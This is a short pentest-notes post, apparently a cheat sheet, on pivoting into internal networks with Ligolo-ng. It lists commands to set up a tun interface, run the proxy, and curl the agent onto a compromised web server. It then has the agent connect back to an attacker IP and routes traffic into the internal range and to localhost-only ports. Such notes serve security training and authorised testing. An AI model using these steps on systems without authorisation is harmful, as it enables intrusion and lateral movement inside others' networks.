arsic@home:~$

Pivoting with Ligolo-ng

Using liogolo to pivot to internal networks:

Setup an interface for ligolo first:

sudo ip tuntap add user [your_username] mode tun ligolo

sudo ip link set ligolo up

Setup the server using the proxy file:

./lin-proxy -selfcert -laddr 0.0.0.0:443

Should see it start up like so: Ligolo startup screen

On Proxy Host:

Any method, just port over the “agent” (client side) file to connect to our server:

curl http://<ip>:port/agent -o agent

Then have it connect back:
./agent -connect <attacker IP here>:<port> -ignore-cert

Adding the new networks to our interface:

sudo ip route add <CIDR NOTATION RANGE YOU WANT ACCESS TO> (IE: 192.168.110.0/24) dev ligolo

Example of having an agent connect (sometimes you may need to use a precompiled agent file from the githubs release page if you get any errors trying to run the version you get if you compile it yourself)

Adding a Lisetner to forward traffic through a pivot:

Ligolo startup screen

In the example above we compromised a web server and we are using it to forward traffic to us on 1337 on it’s 1337, similar to how socat is used and such. But its built into ligolo which is super nice and easy to use.

Ligolo startup screen

Accessing forwarded ports via unique IP:

All u need to do is simply start tunneling an agent.

Ligolo startup screen

start

And then add a route to this unique ip range with your interface: Ligolo startup screen

sudo ip route add 240.0.0.1/32 dev ligolo

And now it has forwarded all local ports to that ip, for instance port 8000 in the below nmap scan is only running on 127.0.0.1, but not we can reach it over the unique ip: Ligolo startup screen